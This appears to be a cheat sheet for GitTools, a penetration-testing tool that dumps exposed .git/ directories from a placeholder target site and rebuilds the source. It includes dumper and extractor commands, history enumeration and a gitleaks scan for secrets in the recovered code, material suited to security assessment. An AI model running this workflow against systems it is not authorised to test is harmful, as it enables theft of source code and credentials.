Skip to content

GitTools

GitTools helps recover source code from exposed .git/ directories. The suite typically includes a dumper and extractor workflow.

Installation

# Clone repo
git clone https://github.com/internetwache/GitTools.git
cd GitTools

Basic Usage

# Dump a remote .git directory
./Dumper/gitdumper.sh https://target.com/.git/ /tmp/git-dump

# Extract a working tree from the dump
./Extractor/gitextractor.sh /tmp/git-dump /tmp/git-extract

Scenarios

# Reconstruct a site with a basic .git exposure
./Dumper/gitdumper.sh https://target.com/.git/ /tmp/git-dump
./Extractor/gitextractor.sh /tmp/git-dump /tmp/git-extract

# Handle a subdirectory web root
./Dumper/gitdumper.sh https://target.com/subdir/.git/ /tmp/git-dump
./Extractor/gitextractor.sh /tmp/git-dump /tmp/git-extract

# Resume a partially downloaded dump
./Dumper/gitdumper.sh https://target.com/.git/ /tmp/git-dump

# Enumerate recovered branches and commits
git -C /tmp/git-extract log --oneline --decorate --graph

# Check for secrets in recovered history
gitleaks detect -s /tmp/git-extract

Notes

  • Some servers block directory listing; the dumper tries common paths and objects.
  • If the dump is incomplete, extraction may yield partial history or missing files.